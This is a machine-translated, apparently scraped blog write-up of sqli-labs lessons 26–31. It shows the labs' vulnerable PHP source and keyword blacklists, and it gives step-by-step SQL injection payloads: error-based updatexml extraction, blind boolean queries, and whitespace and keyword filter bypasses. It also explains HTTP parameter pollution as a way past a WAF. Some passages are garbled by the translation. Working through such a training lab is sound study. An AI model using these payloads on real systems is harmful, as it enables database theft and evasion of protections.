当前位置:网站首页>SQL lab 26~31 summary (subsequent continuous update) (including parameter pollution explanation)
SQL lab 26~31 summary (subsequent continuous update) (including parameter pollution explanation)
2022-07-07 12:24:00 【hcjtn】
sql-lab 26:
At the beginning, we try to use ?id=1’ and 1=2 – q, Find out
During annotation and and – q It didn't work , It means that it filters out all our things
Let's observe its source code first
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-26 Trick with comments</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:40px; text-align:center">Welcome <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
//fiddling with comments
$id= blacklist($id);
//echo "<br>";
//echo $id;
//echo "<br>";
$hint=$id;
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else {
echo "Please input the ID as parameter with numeric value";}
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-26.jpg" />
</br>
</br>
</br>
<img src="../images/Less-26-1.jpg" />
</br>
</br>
<font size='4' color= "#33FFFF">
<?php
echo "Hint: Your Input is Filtered with following result: ".$hint;
?>
</font>
</center>
</body>
</html>
Found such a string of code :
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
or It can be used || perhaps oorr perhaps Replace
and Also for use && aandnd perhaps %26%26 Replace
‘#’ Also for use or ‘1’='1 Replace
There is a strange symbol here :\s: Is to match all blanks , Including line breaks ,\S Not blank , Not including line breaks . That means we can't use... Here Space ,\s Will eliminate it .
So we have to find a way to use special characters to Space Replace it with : such as %0a %a0 Or use () Wrap it up
eg:?id=1’||updatexml(1,concat(0x7e,(select(database())),0x7e),1)||‘1’='1
For details, click (5 Bar message ) URL Special character code comparison table _Danalee_Ay The blog of -CSDN Blog
Question making steps :
Judge database name :?id=1’||updatexml(1,concat(0x7e,(database()),0x7e),1)||‘1’='1
Name of judgment table : ?id=1’||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)=‘security’),0x7e),1)||‘1’='1
Judge the listing :?id=1’||updatexml(1,concat(0x7e,(select(column_name)from(infoorrmation_schema.columns)where(table_schema=‘security’)%26%26(table_name=‘emails’)limit(0,1)),0x7e),1)||‘1’='1
Judgment data :?id=1’||updatexml(1,concat(0x7e,(select(id)from(emails)limit(0,1)),0x7e),1)||‘1’='1
sql-lab 27
Let's first observe his source code : Find out
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
Commented more characters
Judge database name :?id=1’and%0aupdatexml(1,concat(0x7e,(database()),0x7e),1)or’1’='1
Name of judgment table :?id=1’and%0aupdatexml(1,concat(0x7e,(seLect%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=‘security’limit%0a0,1),0x7e),1)or’1’='1
Judge the listing :?id=1’and%0aupdatexml(1,concat(0x7e,(sElect%0acolumn_name%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=‘security’%0aand%0atable_name=‘emails’%0alimit%0a0,1),0x7e),1)or’1’='1
Judgment data :?id=1’and%0aupdatexml(1,concat(0x7e,(sElect%0aid%0afrom%0aemails%0alimit%0a0,1),0x7e),1)or’1’='1
sql-lab 28
Watch its source code again
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
I found that this problem is mainly annotated “-- q” and “union select” The combination of , also because /i It is case insensitive , In this problem, it does not allow union select Connect , Then we can try to use some special symbols to separate them or use other injections
Because in its source code :
else
{
echo '<font color= "#FFFF00">';
//print_r(mysql_error());
echo "</font>";
}
So we can only use sql Blind note
meanwhile :
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
We found that i d Of package Wrap Fang type by ( ′ id The package method of is (' id Of package Wrap Fang type by (′id’)
So in the back sql Use in injection and(‘1’)=('1
Judge the length of the database name :?id=1’)and(length(database()))=8%0aand(‘1’)=('1
Judge database name :
?id=1’)and(ascii(substr(database(),1,1)))=115%0aand(‘1’)=('1
Return to normal , Explain that the first place in the database is s
?id=1’)and(ascii(substr(database(),2,1)))=115%0aand(‘1’)=('1
Return to normal , Explain that the second place in the database is e
Name of judgment table :?id=1’)and(ascii(substr((select%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=‘security’%0alimit%0a0,1),1,1)))=101%0aand(‘1’)=('1
Judge the listing :?id=1’)and(ascii(substr((select%0acolumn_name%0afrom%0ainformation_schema.columns%0awhere%0atable_schema='security’and%0atable_name=‘emails’%0alimit%0a0,1),1,1)))=105%0aand(‘1’)=('1
sql-lab 29~31
This type of problem can be solved if we can use joint query and explicit error injection , It means that our environment is not completely installed , The author here wants us to install two environments Tomcat(jsp) and apache(php), So as to realize our understanding of Parameter pollution The practice of
Of course, building these two environments is too troublesome , So let's open it first 29 Closed folder , Find a log.php The file of
All we need to do is url Add login.php that will do
The core of parameter pollution :WEB Different processing methods for the same parameters submitted should result in
Using parameter pollution can change web The behavior of the application , Access or utilize or uncontrollable variables , And bypass statements such as verification checks , Bypassing some firewalls is important for SQL Detection of Injection
First, let's briefly talk about the general idea of this type of problem : First of all, our biography and participation process jsp Filter ( Determine whether there is any code that can ) And then pass it on to php, Then it will pass through php After the server finishes processing, it returns to jsp The server , So as to display to the client , So we can use parameter pollution to give him two parameters , It will pass the first parameter to jsp Handle , Pass the second parameter to php Handle .
With 29 For example
Input ?id=1 Echo as follows :
If input ?id=1’ – q
Input ?id=1&id=2 Echo as follows :
So there is waf, There is a filter in the first parameter , So we can id=2 Conduct sql Inject
WAF:web Application protection system alias web Application firewall , It can prevent WAB Applications suffer from various attacks , for example SQL Inject , Cross-site scripting vulnerability (XSS) etc.
边栏推荐
- Flet tutorial 17 basic introduction to card components (tutorial includes source code)
- Sign up now | oar hacker marathon phase III midsummer debut, waiting for you to challenge
- UP Meta—Web3.0世界创新型元宇宙金融协议
- When sink is consumed in mysql, the self incrementing primary key has been set in the database table. How to operate in Flink?
- College entrance examination composition, high-frequency mention of science and Technology
- Swiftui tutorial how to realize automatic scrolling function in 2 seconds
- Epp+dis learning path (1) -- Hello world!
- Problem: the string and characters are typed successively, and the results conflict
- powershell cs-UTF-16LE编码上线
- 什么是局域网域名?如何解析?
猜你喜欢
[texture feature extraction] LBP image texture feature extraction based on MATLAB local binary mode [including Matlab source code 1931]
Matlab implementation of Huffman coding and decoding with GUI interface
wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
千人规模互联网公司研发效能成功之路
110. Network security penetration test - [privilege promotion 8] - [windows sqlserver xp_cmdshell stored procedure authorization]
Camera calibration (2): summary of monocular camera calibration
Summed up 200 Classic machine learning interview questions (with reference answers)
Epp+dis learning road (2) -- blink! twinkle!
111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
【滤波跟踪】捷联惯导纯惯导解算matlab实现
随机推荐
ES底层原理之倒排索引
2022 8th "certification Cup" China University risk management and control ability challenge
Cenos openssh upgrade to version 8.4
What are the top-level domain names? How is it classified?
SQL lab 1~10 summary (subsequent continuous update)
@What happens if bean and @component are used on the same class?
[filter tracking] comparison between EKF and UKF based on MATLAB extended Kalman filter [including Matlab source code 1933]
Solve server returns invalid timezone Go to ‘Advanced’ tab and set ‘serverTimezone’ property manually
【滤波跟踪】捷联惯导纯惯导解算matlab实现
人大金仓受邀参加《航天七〇六“我与航天电脑有约”全国合作伙伴大会》
Explore cloud database of cloud services together
超标量处理器设计 姚永斌 第9章 指令执行 摘录
防红域名生成的3种方法介绍
VSCode的学习使用
MATLAB实现Huffman编码译码含GUI界面
The hoisting of the upper cylinder of the steel containment of the world's first reactor "linglong-1" reactor building was successful
全球首堆“玲龙一号”反应堆厂房钢制安全壳上部筒体吊装成功
让数字管理好库存
Introduction to three methods of anti red domain name generation
Unity map auto match material tool map auto add to shader tool shader match map tool map made by substance painter auto match shader tool